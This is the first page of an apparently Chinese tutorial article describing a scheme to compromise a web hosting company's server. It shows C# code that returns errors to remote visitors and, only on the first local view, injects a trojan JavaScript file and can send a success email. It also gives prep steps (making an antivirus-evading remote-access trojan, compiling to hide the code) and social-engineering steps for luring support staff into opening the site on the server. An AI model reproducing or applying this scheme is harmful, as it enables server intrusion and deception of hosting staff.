利用网页挂马获取服务器权限的一种设想


  烈火网教程 客户的网站经常被挂马,不胜其烦。今天在无聊清理代码的时候,灵机一动,想到一个拿服务器权限的方法(先鄙视一下自己,没想到防止挂马的方法,咋先想到害人的方法了捏)。当然此方法纯属胡思乱想,未曾实施过,不保证真正有效。步骤如下:

  准备工作

   1.做好远控木马,做好免杀,找个网马生成器生成网马。然后传到一个空间,并做好相应的加密过的JS引用文件。

   2.找一套正常的网站源码(大家做过的网站随便找一个就ok了),加一段代码,让它只能在本地访问时正常显示,远程访问时出错。(很关键,大家都是程序员,这个功能也不难)。然后通过cs代码往前台页面插入木马js文件,注意,判断一下,只在本地浏览且是第一次浏览时插入,其他情况不插入,当然,为了成功后我们能知道,这里也可以插入一段通知的代码,比如往我们心想发一封成功的e-mail。

  示例代码

  

  if(Request.IsLocal)//判断是否本机访问,当然你可以改为更好的判断方法

   {

   if(ConfigurationManager.AppSettings["sitecode"].Equals("0"))//是否第一次访问的标志,这里为了简单,使用的配置文件,你可以修改为其他更隐蔽的方法

   {

   Configuration config = ConfigurationManager.OpenExeConfiguration(ConfigurationUserLevel.None);

   config.AppSettings.Settings["sitecode"].Value="1";

   config.Save();

   Response.Write("<script language=\"javascript\" src=\"木马js文件路径\" ></script>");

   //发送成功提示的代码

   }

   //正常执行的代码

   }

   else

   Response.Close();

   3.为了安全,把整站编译一下,否则这些小动作别人一看代码就知道了。

  开始实施

   1.找到下手的虚拟主机服务器商,先大致扫一下服务器,看一下安全,性能等等,找到自己满意的。

   2.和他们联系,说是买空间,要求试用。

   3.把准备好的网站传上去。然后找他们客服(装模作样几分钟再去找,别传上立刻去找,以免引起怀疑),说网站在你本地测试一切正常,传到他们服务器上就打不开了。让他们给看看怎么回事。

  等待处理

   1.他们技术会先在他自己机器上输一下网址试试,以测试是不是真的打不开,或者是在打不开的情况下报的是什么错误。当然,在我们程序的控制下,他最终只能看到一个完美的错误页面。

   2.他也许会多找几台机器试试,但是等他看过五六个错误页面后,最终还是要登到服务器上查看。他会查看一下iis的设置,发现没问题。

   3.他也会查看一下你网站的源码,当然,在编译过的情况下,他什么也发现不了。

   4.这时,他很有可能会在服务器运行一下你的网站,这时,程序检测到是本地浏览,于是正常显示,同时程序检测到是第一次运行,于是插入木马js。于是我们的木马就成功植入了他们服务器,如果你写了提示代码,这时你会收到一封成功的e-mail。这时你不要干等,要在沟通的过程中引导他们在服务器上运行你的网站。

  • 共2页:
  • 上一页
  • 1
  • 2
  • 下一页

相关内容